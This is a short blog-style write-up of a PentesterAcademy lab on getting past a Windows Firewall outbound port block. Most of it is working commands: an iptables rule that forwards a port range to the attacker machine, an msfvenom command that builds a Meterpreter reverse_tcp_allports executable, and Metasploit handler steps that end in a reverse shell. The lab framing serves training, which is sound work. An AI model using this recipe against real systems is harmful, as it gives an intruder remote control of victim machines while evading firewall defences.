Firewall Bypass: Outbound Range

Hello friends, In this post, I’ll share with you how you can bypass Windows Firewall (Automatic Outbound Open Port Detection).

I solved this lab on PentesterAcademy, you can also do this lab here, if you are subscribed member.

Scenario: Windows machine is running with Firewall turned on and the Outbound port range 4444-6009 is blocked. The task is to knock the all ports and get a reverse shell using Metasploit.

Below, we can see that the block port range is defined as 4444-6009.

In, our attacker machine, i use iptables to forward port 6010 to port 4444.

$ iptables -A PREROUTING -t nat -i eth0 -p  tcp --dport 4444:6010 -j DNAT --to-destination 10.5.17.234:4444 
// --to-destination ip is attacker machine ip address.

after, setting up iptables rule, i make payload using msfvenom.

$ msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=10.5.17.234 lport=4444 -f exe -o bypass.exe
// reverse_tcp_allports will knock the all ports for valid connection.

now, transfer the file to victim machine and download using firewall and powershell.

now, open msfconsole.

$ msf6 > use multi/handler
$ msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports
$ msf6 exploit(multi/handler) > set lhost eth0
$ msf6 exploit(multi/handler) > set lport 4444
$ msf6 exploit(multi/handler) > exploit

now, we can see we got our reverse shell.

If you face any problems, let me know in the comment section.

Leave a Reply

Your email address will not be published. Required fields are marked *